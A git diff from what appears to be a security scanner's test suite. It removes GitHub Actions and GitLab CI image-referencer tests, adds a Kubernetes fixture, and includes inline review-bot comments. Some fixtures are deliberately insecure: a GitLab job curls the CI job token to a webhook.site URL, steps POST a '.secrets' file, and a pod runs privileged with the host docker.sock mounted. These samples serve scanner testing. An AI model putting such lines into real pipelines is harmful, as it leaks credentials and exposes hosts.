"__endline__": 8 - }, - "__startline__": 3, - "__endline__": 8 - }, - "jobs": { - "first_job": { - "runs-on": "ubuntu-latest", - "name": "Name", - "container": "node:14.22", - "steps": [ - { - "name": "Checkout codebase", - "uses": "actions/checkout@v3", - "__startline__": 14, - "__endline__": 16 - }, - { - "name": "infrastructure", - "working-directory": "terraform", - 
"shell": "bash", - "env": { - "TF_INPUT": 0, - "__startline__": 20, - "__endline__": 21 - }, - "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n", - "__startline__": 16, - "__endline__": 24 - } - ], - "__startline__": 10, - "__endline__": 24 - }, - "second_job": { - "runs-on": "ubuntu-latest", - "name": "Name", - "container": "node:14.16", - "steps": [ - { - "name": "Checkout codebase", - "uses": "actions/checkout@v3", - "__startline__": 29, - "__endline__": 31 - }, - { - "name": "infrastructure", - "working-directory": "terraform", - "shell": "bash", - "env": { - "TF_INPUT": 0, - "__startline__": 35, - "__endline__": 36 - }, - "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n", - "__startline__": 31, - "__endline__": 39 - } - ], - "__startline__": 25, - "__endline__": 39 - }, - "__startline__": 24, - "__endline__": 39 - }, - "__startline__": 1, - "__endline__": 39 - } - - -@pytest.fixture -def workflow_with_two_identical_images() -> dict[str, Any]: - return { - "name": "Name", - "on": { - "workflow_dispatch": { - "inputs": { - "logLevel": { - "description": "Log level", - "__startline__": 6, - "__endline__": 8 - }, - "__startline__": 5, - "__endline__": 8 - }, - "__startline__": 4, - "__endline__": 8 - }, - "__startline__": 3, - "__endline__": 8 - }, - "jobs": { - "first_job": { - "runs-on": "ubuntu-latest", - "name": "Name", - "container": "node:14.16", - "steps": [ - { - "name": "Checkout codebase", - "uses": "actions/checkout@v3", - "__startline__": 14, - "__endline__": 16 - }, - { - "name": "infrastructure", - "working-directory": "terraform", - "shell": "bash", - "env": { - "TF_INPUT": 0, - "__startline__": 20, - "__endline__": 21 - }, - "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n", - "__startline__": 16, - "__endline__": 24 - } - ], - "__startline__": 10, - "__endline__": 24 - }, - "second_job": { - "runs-on": "ubuntu-latest", - "name": "Name", - 
"container": "node:14.16", - "steps": [ - { - "name": "Checkout codebase", - "uses": "actions/checkout@v3", - "__startline__": 29, - "__endline__": 31 - }, - { - "name": "infrastructure", - "working-directory": "terraform", - "shell": "bash", - "env": { - "TF_INPUT": 0, - "__startline__": 35, - "__endline__": 36 - }, - "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n", - "__startline__": 31, - "__endline__": 39 - } - ], - "__startline__": 25, - "__endline__": 39 - }, - "__startline__": 24, - "__endline__": 39 - }, - "__startline__": 1, - "__endline__": 39 - } - - -@pytest.fixture -def workflow_line_numbers_without_image() -> list[tuple[int, str]]: - return [(1, 'on: pull_request\n'), - (2, '\n'), - (3, 'name: unsecure-worfklow\n'), - (4, '\n'), - (5, 'jobs:\n'), - (6, ' unsecure-job:\n'), - (7, ' name: job2\n'), - (8, ' runs-on: ubuntu-latest\n'), - (9, ' env:\n'), - (10, ' ACTIONS_ALLOW_UNSECURE_COMMANDS: true\n'), - (11, ' steps:\n'), - (12, ' - name: unsecure-step2\n'), - (13, ' run: |\n'), - (14, ' echo "goo"\n'), - (15, ' secure-job:\n'), - (16, ' name: job3\n'), - (17, ' runs-on: ubuntu-latest\n'), - (18, ' env:\n'), - (19, ' ACTIONS_ALLOW_UNSECURE_COMMANDS: false\n'), - (20, ' run: |\n'), - (21, ' echo "ok"')] - - -@pytest.fixture -def image_cached_result() -> dict[str, Any]: - return { - "results": [ - { - "id": "sha256:f9b91f78b0344fa0efc5583d79e78a90556ab0bb3f93fcbc8728b0b70d29a5db", - "name": "python:3.9-alpine", - "distro": "Alpine Linux v3.16", - "distroRelease": "3.16.1", - "digest": "sha256:83a343afa488ff14d0c807b62770140d2ec30ef2e83a3a45c4ce62c29623e240", - "collections": ["All"], - "packages": [{"type": "os", "name": "zlib", "version": "1.2.12-r1", "licenses": ["Zlib"]}], - "compliances": [], - "complianceDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0}, - "complianceScanPassed": True, - "vulnerabilities": [ - { - "id": "CVE-2022-37434", - "status": "fixed in 1.2.12-r2", - "description": 
"zlib through 1.2.12 has a heap-based buffer over-read ...", - "severity": "low", - "packageName": "zlib", - "packageVersion": "1.2.12-r1", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", - "riskFactors": ["Has fix", "Recent vulnerability"], - "impactedVersions": ["<1.2.12-r2"], - "publishedDate": "2022-08-05T07:15:00Z", - "discoveredDate": "2022-08-08T13:45:43Z", - "fixDate": "2022-08-05T07:15:00Z", - } - ], - "vulnerabilityDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 1, "total": 1}, - "vulnerabilityScanPassed": True, - } - ] - } - - -@pytest.fixture -def definition() -> dict[str, Any]: - return { - "name": "CI", - "on": { - "push": { - "branches": [ - "main" - ], - "__startline__": 4, - "__endline__": 5 - }, - "__startline__": 3, - "__endline__": 5 - }, - "jobs": { - "container-test-job": { - "runs-on": "ubuntu-latest", - "container": { - "image": "node:14.16", - "env": { - "NODE_ENV": "development", - "__startline__": 11, - "__endline__": 12 - }, - "ports": [ - 80 - ], - "volumes": [ - "my_docker_volume:/volume_mount" - ], - "options": "--cpus 1", - "__startline__": 9, - "__endline__": 17 - }, - "steps": [ - { - "name": "Check for dockerenv file", - "run": "(ls /.dockerenv && echo Found dockerenv) || (echo No dockerenv)\ncurl -X POST -s --data \"@.secrets\" /dev/null\n", - "__startline__": 18, - "__endline__": 23 - } - ], - "__startline__": 7, - "__endline__": 23 - }, - "second_job": { - "runs-on": "ubuntu-latest", - "steps": [ - { - "name": "Check for dockerenv file", - "run": "(ls /.dockerenv && echo Found dockerenv) || (echo No dockerenv)\ncurl -X POST -s --data \"@.secrets\" /dev/null\n", - "__startline__": 26, - "__endline__": 30 - } - ], - "__startline__": 24, - "__endline__": 30 - }, - "__startline__": 6, - "__endline__": 30 - }, - "__startline__": 1, - "__endline__": 30 - } \ No newline at end of file 
diff --git a/tests/github_actions/image_referencer/test_github_action_provider.py b/tests/github_actions/image_referencer/test_github_action_provider.py deleted file mode 100644 index 5c5f64f6aa6..00000000000 --- a/tests/github_actions/image_referencer/test_github_action_provider.py +++ /dev/null 
@@ -1,95 +0,0 @@ -import pytest - -from checkov.common.images.image_referencer import Image -from checkov.github_actions.image_referencer.provider import GithubActionProvider -from checkov.github_actions.runner import Runner - -def test_extract_images_from_workflow(workflow_with_images, workflow_line_numbers_with_image): - file_path = '/.github/workflows/workflow_with_string_container.yml' - - gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_with_images, - workflow_line_numbers=workflow_line_numbers_with_image) - images = gha_provider.extract_images_from_workflow() - - assert images == [ - Image( - end_line=13, - start_line=12, - name='node:14.16', - file_path=file_path, - related_resource_id='jobs(destroy_cert)' - ) - ] - - -def test_extract_images_from_workflow_no_images(workflow_without_images, workflow_line_numbers_without_image): - file_path = '/.github/workflows/unsecure_command.yaml' - - gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_without_images, - workflow_line_numbers=workflow_line_numbers_without_image) - images = gha_provider.extract_images_from_workflow() - - assert not images - - -def test_extract_images_from_workflow_with_first_image(workflow_with_image_first, workflow_line_numbers_with_image_first): - file_path = '/.github/workflows/command.yaml' - - gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_with_image_first, - workflow_line_numbers=workflow_line_numbers_with_image_first) - images = gha_provider.extract_images_from_workflow() - - assert len(images) == 2 - assert images[0].start_line != images[1].start_line - assert images[0].end_line != images[1].end_line - assert images[0].related_resource_id != images[1].related_resource_id - - -def test_extract_images_from_workflow_correct_line_numbers(workflow_with_two_identical_images, - workflow_line_numbers_with_two_identical_images): - file_path = '/.github/workflows/unsecure_command.yaml' - - 
gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_with_two_identical_images, - workflow_line_numbers=workflow_line_numbers_with_two_identical_images) - images = gha_provider.extract_images_from_workflow() - - assert len(images) == 2 - assert images[0].start_line != images[1].start_line - assert images[0].end_line != images[1].end_line - assert images[0].related_resource_id != images[1].related_resource_id - - -@pytest.mark.parametrize( - "start_line,end_line,expected_key", - [ - (9, 17, "jobs(container-test-job)"), - (24, 30, "jobs(second_job)"), - (35, 40, "") - ], -) -def test_generate_resource_key(start_line, end_line, expected_key, definition): - gha_provider = GithubActionProvider(definition, '', []) - - key = gha_provider.generate_resource_key(start_line, end_line) - - assert key == expected_key - - -@pytest.mark.parametrize( - "start_line, end_line, supported_entities, old_key_format, expected_key", - [ - (9, 17, ('jobs', 'jobs.*.steps[]'), 'jobs.container-test-job.CKV_GHA_3[7:23]', "jobs(container-test-job)"), - (24, 30, ('jobs', 'jobs.*.steps[]'), "jobs.second_job.CKV_GHA_3[24:30]", "jobs(second_job)") - ], -) -def test_generate_resource_key_generates_same_key_as_get_resource(start_line, end_line, supported_entities, - old_key_format, expected_key, definition): - gha_provider = GithubActionProvider(definition, '', []) - runner = Runner() - file_path = "mock_path" - runner.definitions[file_path] = definition - - key1 = runner.get_resource(file_path, old_key_format, supported_entities, start_line, end_line) - key2 = gha_provider.generate_resource_key(start_line, end_line) - - assert key1 == key2 == expected_key diff --git a/tests/github_actions/image_referencer/test_manager.py b/tests/github_actions/image_referencer/test_manager.py deleted file mode 100644 index 5c8a8350864..00000000000 --- a/tests/github_actions/image_referencer/test_manager.py +++ /dev/null 
@@ -1,30 +0,0 @@ -from checkov.common.images.image_referencer import Image -from checkov.github_actions.image_referencer.manager import GithubActionsImageReferencerManager - - -def test_extract_images_from_workflow(workflow_with_images, workflow_line_numbers_with_image): - file_path = '/.github/workflows/workflow_with_string_container.yml' - - manager = GithubActionsImageReferencerManager(file_path=file_path, workflow_config=workflow_with_images, - workflow_line_numbers=workflow_line_numbers_with_image) - images = manager.extract_images_from_workflow() - - assert images == [ - Image( - end_line=13, - start_line=12, - name='node:14.16', - file_path=file_path, - related_resource_id='jobs(destroy_cert)' - ) - ] - - -def test_extract_images_from_workflow_no_images(workflow_without_images, workflow_line_numbers_without_image): - file_path = '/.github/workflows/unsecure_command.yaml' - - manager = GithubActionsImageReferencerManager(file_path=file_path, workflow_config=workflow_without_images, - workflow_line_numbers=workflow_line_numbers_without_image) - images = manager.extract_images_from_workflow() - - assert not images diff --git a/tests/github_actions/image_referencer/test_runner.py b/tests/github_actions/image_referencer/test_runner.py deleted file mode 100644 index d14473b37a0..00000000000 --- a/tests/github_actions/image_referencer/test_runner.py +++ /dev/null 
@@ -1,65 +0,0 @@ -from pathlib import Path - -from checkov.common.output.report import CheckType - -from checkov.common.bridgecrew.bc_source import get_source_type -from checkov.github_actions.runner import Runner - -from checkov.runner_filter import RunnerFilter -from pytest_mock import MockerFixture - -from tests.common.image_referencer.test_utils import mock_get_license_statuses_async, mock_get_image_cached_result_async - -RESOURCES_PATH = Path(__file__).parent.parent / "resources/.github/workflows" - - -def test_github_action_workflow(mocker: MockerFixture): - from checkov.common.bridgecrew.platform_integration import bc_integration - - file_name = "workflow_with_string_container.yml" - image_name = "node:14.16" - image_id = "sha256:2460522297" - code_lines = "12-13" - image_resource_postfixes = ["go", "openssl", "musl"] - test_file = RESOURCES_PATH / file_name - - runner_filter = RunnerFilter(run_image_referencer=True) - bc_integration.bc_source = get_source_type("disabled") - - mocker.patch( - "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async", - side_effect=mock_get_image_cached_result_async, - ) - mocker.patch( - "checkov.common.images.image_referencer.get_license_statuses_async", - side_effect=mock_get_license_statuses_async, - ) - # 'workflow_with_string_container.yml (node:14.16 lines:12-13 (sha256:f9b91f78b0)).musl' - reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter) - - assert len(reports) == 2 - - gha_report = next(report for report in reports if report.check_type == CheckType.GITHUB_ACTIONS) - sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) - - assert len(gha_report.resources) == 0 - assert len(gha_report.passed_checks) == 14 - assert len(gha_report.failed_checks) == 2 - assert len(gha_report.skipped_checks) == 0 - assert len(gha_report.parsing_errors) == 0 - - assert len(sca_image_report.resources) == 3 - assert 
sca_image_report.resources == { - f".github/workflows/{file_name} ({image_name} lines:{code_lines} ({image_id})).{postfix}" - for postfix in image_resource_postfixes - } - assert sca_image_report.image_cached_results[0]["dockerImageName"] == "node:14.16" - assert sca_image_report.image_cached_results[0]["packages"] == [ - {"type": "os", "name": "tzdata", "version": "2021a-1+deb11u5", "licenses": []} - ] - - assert len(sca_image_report.passed_checks) == 1 - assert len(sca_image_report.failed_checks) == 4 - assert len(sca_image_report.image_cached_results) == 1 - assert len(sca_image_report.skipped_checks) == 0 - assert len(sca_image_report.parsing_errors) == 0 diff --git a/tests/gitlab_ci/image_referencer/__init__.py b/tests/gitlab_ci/image_referencer/__init__.py deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/tests/gitlab_ci/image_referencer/resources/single_image/.gitlab-ci.yml b/tests/gitlab_ci/image_referencer/resources/single_image/.gitlab-ci.yml deleted file mode 100644 index bb827be51cb..00000000000 --- a/tests/gitlab_ci/image_referencer/resources/single_image/.gitlab-ci.yml +++ /dev/null @@ -1,7 +0,0 @@ -default: - image: - name: redis:latest - entrypoint: ["/bin/bash"] - -deploy: - script: 'curl -H \"Content-Type: application/json\" -X POST --data "$CI_JOB_JWT_V1" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826' \ No newline at end of file diff --git a/tests/gitlab_ci/image_referencer/resources/single_image/image_without_name.gitlab-ci.yml b/tests/gitlab_ci/image_referencer/resources/single_image/image_without_name.gitlab-ci.yml deleted file mode 100644 index 28796e6c1fe..00000000000 --- a/tests/gitlab_ci/image_referencer/resources/single_image/image_without_name.gitlab-ci.yml +++ /dev/null @@ -1,8 +0,0 @@ -unit tests: - image: - entrypoint: - - "/opt/bin/entry_point_unit_tests.sh" - - services: - - name: "postgres:13.2" - alias: postgres \ No newline at end of file 
diff --git a/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py b/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py deleted file mode 100644 index 5857aabca69..00000000000 --- a/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py +++ /dev/null 
@@ -1,139 +0,0 @@ -from checkov.common.images.image_referencer import Image -from checkov.gitlab_ci.image_referencer.provider import GitlabCiProvider - - -def test_extract_images_from_workflow(): - file_path = 'tests/gitlab_ci/resources/images/.gitlab-ci.yml' - workflow_config = { - "default": { - "image": { - "name": "ruby:2.6", - "entrypoint": [ - "/bin/bash" - ], - "__startline__": 3, - "__endline__": 6 - }, - "services": [ - { - "name": "privateregistry/stuff/my-postgres:11.7", - "alias": "db-postgres", - "__startline__": 7, - "__endline__": 9 - }, - { - "name": "redis:latest", - "__startline__": 9, - "__endline__": 10 - }, - "nginx:1.17" - ], - "before_script": [ - "bundle install" - ], - "__startline__": 2, - "__endline__": 15 - }, - "__startline__": 1, - "__endline__": 32 - } - - gitlab_ci_provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path) - images = gitlab_ci_provider.extract_images_from_workflow() - - assert set(images) == { - Image( - end_line=6, - start_line=3, - file_path=file_path, - name='ruby:2.6', - related_resource_id='default.image' - ), - Image( - end_line=10, - start_line=9, - file_path=file_path, - name='redis:latest', - related_resource_id='default.services.2' - ), - Image( - end_line=10, - start_line=9, - file_path=file_path, - name='nginx:1.17', - related_resource_id='default.services.2' - ), - Image( - end_line=9, - start_line=7, - file_path=file_path, - name='privateregistry/stuff/my-postgres:11.7', - related_resource_id='default.services.1' - ) - } - - -def test_extract_images_from_workflow_no_images(): - file_path = 'tests/gitlab_ci/resources/rules/.gitlab-ci.yml' - workflow_config = { - "script": "echo \"This job creates double pipelines!\"", - "rules": [ - { - "changes": [ - "$DOCKERFILES_DIR/*" - ], - "__startline__": 4, - "__endline__": 6 - }, - { - "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"push\"", - "__startline__": 6, - "__endline__": 7 - }, - { - "if": "$CI_PIPELINE_SOURCE \u003d\u003d 
\"merge_request_event\"", - "__startline__": 7, - "__endline__": 9 - } - ], - "__startline__": 2, - "__endline__": 9 - } - - gitlab_ci_provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path) - images = gitlab_ci_provider.extract_images_from_workflow() - - assert not images - - -def test_extract_images_from_workflow_image_without_name(): - file_path = 'tests/gitlab_ci/resources/rules/image_without_name.gitlab-ci.yml' - workflow_config = { - "unit tests": { - "image": { - "entrypoint": [ - "/opt/bin/entry_point_unit_tests.sh" - ], - "__startline__": 3, - "__endline__": 6 - }, - "services": [ - { - "name": "postgres:13.2", - "alias": "postgres", - "__startline__": 7, - "__endline__": 8 - } - ], - "__startline__": 2, - "__endline__": 8 - }, - "__startline__": 1, - "__endline__": 8 - } - - gitlab_ci_provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path) - images = gitlab_ci_provider.extract_images_from_workflow() - - assert len(images) == 1 - assert images[0] == Image(name='postgres:13.2', file_path=file_path, start_line=7, end_line=8, related_resource_id='unit tests.services.1') diff --git a/tests/gitlab_ci/image_referencer/test_manager.py b/tests/gitlab_ci/image_referencer/test_manager.py deleted file mode 100644 index 869e8419c89..00000000000 --- a/tests/gitlab_ci/image_referencer/test_manager.py +++ /dev/null 
@@ -1,106 +0,0 @@ -from checkov.common.images.image_referencer import Image -from checkov.gitlab_ci.image_referencer.manager import GitlabCiImageReferencerManager - - -def test_extract_images_from_workflow(): - file_path = 'tests/gitlab_ci/resources/images/.gitlab-ci.yml' - workflow_config = { - "default": { - "image": { - "name": "ruby:2.6", - "entrypoint": [ - "/bin/bash" - ], - "__startline__": 3, - "__endline__": 6 - }, - "services": [ - { - "name": "privateregistry/stuff/my-postgres:11.7", - "alias": "db-postgres", - "__startline__": 7, - "__endline__": 9 - }, - { - "name": "redis:latest", - "__startline__": 9, - "__endline__": 10 - }, - "nginx:1.17" - ], - "before_script": [ - "bundle install" - ], - "__startline__": 2, - "__endline__": 15 - }, - "__startline__": 1, - "__endline__": 32 - } - - manager = GitlabCiImageReferencerManager(workflow_config=workflow_config, file_path=file_path) - images = manager.extract_images_from_workflow() - - assert set(images) == { - Image( - end_line=6, - start_line=3, - file_path=file_path, - name='ruby:2.6', - related_resource_id='default.image' - ), - Image( - end_line=10, - start_line=9, - file_path=file_path, - name='redis:latest', - related_resource_id='default.services.2' - ), - Image( - end_line=10, - start_line=9, - file_path=file_path, - name='nginx:1.17', - related_resource_id='default.services.2' - ), - Image( - end_line=9, - start_line=7, - file_path=file_path, - name='privateregistry/stuff/my-postgres:11.7', - related_resource_id='default.services.1' - ) - } - - -def test_extract_images_from_workflow_no_images(): - file_path = 'tests/gitlab_ci/resources/rules/.gitlab-ci.yml' - workflow_config = { - "script": "echo \"This job creates double pipelines!\"", - "rules": [ - { - "changes": [ - "$DOCKERFILES_DIR/*" - ], - "__startline__": 4, - "__endline__": 6 - }, - { - "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"push\"", - "__startline__": 6, - "__endline__": 7 - }, - { - "if": "$CI_PIPELINE_SOURCE \u003d\u003d 
\"merge_request_event\"", - "__startline__": 7, - "__endline__": 9 - } - ], - "__startline__": 2, - "__endline__": 9 - } - - manager = GitlabCiImageReferencerManager(workflow_config=workflow_config, file_path=file_path) - images = manager.extract_images_from_workflow() - - assert not images diff --git a/tests/gitlab_ci/image_referencer/test_runner_gitlab_workflows.py b/tests/gitlab_ci/image_referencer/test_runner_gitlab_workflows.py deleted file mode 100644 index cb8d0d193ca..00000000000 --- a/tests/gitlab_ci/image_referencer/test_runner_gitlab_workflows.py +++ /dev/null 
@@ -1,65 +0,0 @@ -from pathlib import Path - -from checkov.common.output.report import CheckType - -from checkov.common.bridgecrew.bc_source import get_source_type -from checkov.gitlab_ci.runner import Runner - -from checkov.runner_filter import RunnerFilter -from pytest_mock import MockerFixture - -from tests.common.image_referencer.test_utils import mock_get_license_statuses_async, mock_get_image_cached_result_async - -RESOURCES_PATH = Path(__file__).parent / "resources/single_image" - - -def test_gitlab_workflow(mocker: MockerFixture): - from checkov.common.bridgecrew.platform_integration import bc_integration - file_name = ".gitlab-ci.yml" - image_name = "redis:latest" - image_id = "sha256:2460522297" - code_lines = "3-6" - image_resource_postfixes = ['go', 'openssl', 'musl'] - test_file = RESOURCES_PATH / file_name - - runner_filter = RunnerFilter(run_image_referencer=True) - bc_integration.bc_source = get_source_type("disabled") - - mocker.patch( - "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async", - side_effect=mock_get_image_cached_result_async, - ) - mocker.patch( - "checkov.common.images.image_referencer.get_license_statuses_async", - side_effect=mock_get_license_statuses_async, - ) - - reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter) - - assert len(reports) == 2 - - gitlab_ci_report = next(report for report in reports if report.check_type == CheckType.GITLAB_CI) - sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) - - assert len(gitlab_ci_report.resources) == 0 - assert len(gitlab_ci_report.passed_checks) == 1 - assert len(gitlab_ci_report.failed_checks) == 1 - assert len(gitlab_ci_report.skipped_checks) == 0 - assert len(gitlab_ci_report.parsing_errors) == 0 - - assert len(sca_image_report.resources) == 3 - assert sca_image_report.resources == { - f"{file_name} ({image_name} lines:{code_lines} ({image_id})).{postfix}" - for 
postfix in image_resource_postfixes
- }
- assert sca_image_report.image_cached_results[0]["dockerImageName"] == "redis:latest"
- assert sca_image_report.image_cached_results[0]["packages"] == [
- {"type": "os", "name": "tzdata", "version": "2021a-1+deb11u5", "licenses": []}
- ]
-
- assert len(sca_image_report.passed_checks) == 1
- assert len(sca_image_report.failed_checks) == 4
- assert len(sca_image_report.image_cached_results) == 1
- assert len(sca_image_report.skipped_checks) == 0
- assert len(sca_image_report.parsing_errors) == 0
- assert gitlab_ci_report.passed_checks[0].resource == sca_image_report.image_cached_results[0]["relatedResourceId"]
diff --git a/tests/sast/test_filter_files_manager.py b/tests/sast/test_filter_files_manager.py
index b8c6befdfb4..884ede76887 100644
--- a/tests/sast/test_filter_files_manager.py
+++ b/tests/sast/test_filter_files_manager.py
@@ -8,7 +8,9 @@ def test_sast_js_filtered_files_by_ts():
 test_dir = os.path.join(pathlib.Path(__file__).parent.resolve(), 'source_code', 'js_filtered_build_ts')
 files_filter_manager = FilesFilterManager([test_dir], set([SastLanguages.JAVASCRIPT]))
 filtered_paths = files_filter_manager.get_files_to_filter()
- assert len(filtered_paths) == 3
- assert filtered_paths[0].endswith('example2/build/file.js')
- assert filtered_paths[1].endswith('example1/build')
- assert filtered_paths[2].endswith('example3/main.js')
+ paths = {}
+ for path in filtered_paths:
+ if path.endswith('example2/build/file.js') or path.endswith('example1/build') or path.endswith('example3/main.js'):
+ paths[path] = path
+
+ assert len(paths.keys()) == 3
\ No newline at end of file
diff --git a/tests/sca_image/conftest.py b/tests/sca_image/conftest.py
index a8092dcd6ae..61772b58723 100644
--- a/tests/sca_image/conftest.py
+++ b/tests/sca_image/conftest.py
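Review bot: The rewritten assertions in test_sast_js_filtered_files_by_ts are weaker than the four they replace: the new loop counts only paths that match one of the three suffixes and no longer asserts `len(filtered_paths) == 3`, so an unexpected extra filtered path would pass unnoticed. `paths` is a dict used as a set, and `len(paths.keys())` is just `len(paths)`. A set comprehension keeps the order-independence the change is after while restoring the total-count check: `matched = {p for p in filtered_paths if p.endswith(('example2/build/file.js', 'example1/build', 'example3/main.js'))}` followed by `assert len(filtered_paths) == 3` and `assert len(matched) == 3`. The hunk also drops the file's trailing newline; the `def` line itself is only visible as the hunk's header context.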
@@ -14,9 +14,9 @@ from checkov.common.output.report import Report from .mocks import mock_scan +KUBERNETES_EXAMPLES_DIR = Path(__file__).parent / "examples/kubernetes" DOCKERFILE_EXAMPLES_DIR = Path(__file__).parent / "examples/dockerfile" - @pytest.fixture() def image_id() -> str: return "sha256:6fd085fc6410" @@ -50,7 +50,7 @@ def empty_report() -> dict[str, Any]: @pytest.fixture() def image_name() -> str: - return "python:3.8-alpine" + return "ubuntu" @pytest.fixture() diff --git a/tests/sca_image/examples/example/.github/workflows/vulnerable_container.yaml b/tests/sca_image/examples/example/.github/workflows/vulnerable_container.yaml deleted file mode 100644 index 482319d2a29..00000000000 --- a/tests/sca_image/examples/example/.github/workflows/vulnerable_container.yaml +++ /dev/null @@ -1,20 +0,0 @@ -name: CI -on: - push: - branches: [ main ] -jobs: - container-test-job: - runs-on: ubuntu-latest - container: - image: node:14.16 - env: - NODE_ENV: development - ports: - - 80 - volumes: - - my_docker_volume:/volume_mount - options: --cpus 1 - steps: - - name: Check for dockerenv file - run: (ls /.dockerenv && echo Found dockerenv) || (echo No dockerenv) - \ No newline at end of file diff --git a/tests/sca_image/examples/kubernetes/deployment.yaml b/tests/sca_image/examples/kubernetes/deployment.yaml new file mode 100644 index 00000000000..225f7176588 --- /dev/null +++ b/tests/sca_image/examples/kubernetes/deployment.yaml 
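Review bot: The first conftest.py hunk removes a blank line (the `-` line after `DOCKERFILE_EXAMPLES_DIR`), which from the collapsed rendering appears to leave fewer than the two blank lines PEP 8 wants between the module-level constants and the `@pytest.fixture()` that follows; the exact count is hard to confirm here, but the removal looks unintended. Keep the blank line, and consider listing `DOCKERFILE_EXAMPLES_DIR` before `KUBERNETES_EXAMPLES_DIR` so the two constants read in alphabetical order. In the second hunk the `image_name` fixture now returns the untagged `ubuntu`; presumably this must match the image referenced by the dockerfile example, so a comment such as `# must match the image referenced in examples/dockerfile` would stop the two from drifting apart.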
@@ -0,0 +1,44 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+ name: health-check-deployment
+spec:
+ selector:
+ matchLabels:
+ app: health-check
+ template:
+ metadata:
+ labels:
+ app: health-check
+ spec:
+ containers:
+ - name: health-check
+ image: node:14.16
+ resources:
+ limits:
+ memory: "100Mi"
+ cpu: "30m"
+ ports:
+ - containerPort: 80
+ # Custom Stuff
+ securityContext:
+ privileged: true
+ volumeMounts:
+ - mountPath: /custom/docker/docker.sock
+ name: docker-sock-volume
+ volumes:
+ - name: docker-sock-volume
+ hostPath:
+ path: /var/run/docker.sock
+---
+apiVersion: v1
+kind: Service
+metadata:
+ name: health-check-service
+spec:
+ ports:
+ - protocol: TCP
+ port: 80
+ targetPort: 80
+ selector:
+ app: health-check
\ No newline at end of file
diff --git a/tests/sca_image/test_runner.py b/tests/sca_image/test_runner.py
index 58571d0c493..ade8644e5db 100644
--- a/tests/sca_image/test_runner.py
+++ b/tests/sca_image/test_runner.py
@@ -13,15 +13,13 @@ from checkov.common.bridgecrew.code_categories import CodeCategoryType
 from checkov.common.bridgecrew.severities import Severities, BcSeverities
 from checkov.common.models.enums import CheckResult
-from checkov.github_actions.runner import Runner as GHA_Runner
+from checkov.dockerfile.runner import Runner as Dockerfile_Runner
+from checkov.kubernetes.runner import Runner as Kubernetes_Runner
 from checkov.runner_filter import RunnerFilter
 from checkov.sca_image.runner import Runner
+from .conftest import DOCKERFILE_EXAMPLES_DIR, KUBERNETES_EXAMPLES_DIR
 from .mocks import mock_scan_empty, mock_scan_image
-WORKFLOW_EXAMPLES_DIR = Path(__file__).parent / "examples/.github/workflows"
-WORKFLOW_IMAGE_EXAMPLES_DIR = Path(__file__).parent / "examples/example/.github/workflows"
-DOCKERFILE_EXAMPLES_DIR = Path(__file__).parent / "examples/dockerfile"
-
 def test_image_referencer_trigger_image_flow_calls(mock_bc_integration, image_name, cached_scan_result):
 # given
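Review bot: The `# Custom Stuff` comment in deployment.yaml does not say why the container runs with `privileged: true` and mounts the host's `/var/run/docker.sock`; for an image-referencer fixture only `image: node:14.16` appears to matter, and the extra insecure settings will produce Kubernetes check failures that other tests in this directory may or may not be counting on. Replace the comment with one that states the intent, e.g. `# Intentionally insecure (privileged + host docker.sock) test fixture; do not copy into real manifests`, or drop the two settings if nothing asserts on them. The file is also written without a trailing newline.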
@@ -59,8 +57,8 @@ def test_image_referencer_trigger_image_flow_calls(mock_bc_integration, image_na ) # when - reports = GHA_Runner().run(root_folder=str(WORKFLOW_EXAMPLES_DIR), - runner_filter=RunnerFilter(run_image_referencer=True)) + reports = Dockerfile_Runner().run(root_folder=str(DOCKERFILE_EXAMPLES_DIR), + runner_filter=RunnerFilter(run_image_referencer=True)) sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) @@ -69,9 +67,9 @@ def test_image_referencer_trigger_image_flow_calls(mock_bc_integration, image_na assert len(sca_image_report.passed_checks) == 1 -def test_runner_honors_enforcement_rules(mock_bc_integration, image_name, cached_scan_result): +def test_runner_honors_enforcement_rules(mock_bc_integration, image_name2, cached_scan_result): # given - image_id_encoded = quote_plus(f"image:{image_name}") + image_id_encoded = quote_plus(f"image:{image_name2}") response_json = { "violations": [ @@ -109,14 +107,14 @@ def test_runner_honors_enforcement_rules(mock_bc_integration, image_name, cached # this is not quite a true test, because the checks don't have severities. However, this shows that the check registry # passes the report type properly to RunnerFilter.should_run_check, and we have tests for that method runner_filter.enforcement_rule_configs = { - CheckType.GITHUB_ACTIONS: Severities[BcSeverities.OFF], + CheckType.KUBERNETES: Severities[BcSeverities.OFF], CheckType.SCA_IMAGE: { CodeCategoryType.LICENSES: Severities[BcSeverities.OFF], CodeCategoryType.VULNERABILITIES: Severities[BcSeverities.OFF] } } - reports = GHA_Runner().run(root_folder=str(WORKFLOW_EXAMPLES_DIR), runner_filter=runner_filter) + reports = Kubernetes_Runner().run(root_folder=str(KUBERNETES_EXAMPLES_DIR), runner_filter=runner_filter) sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) 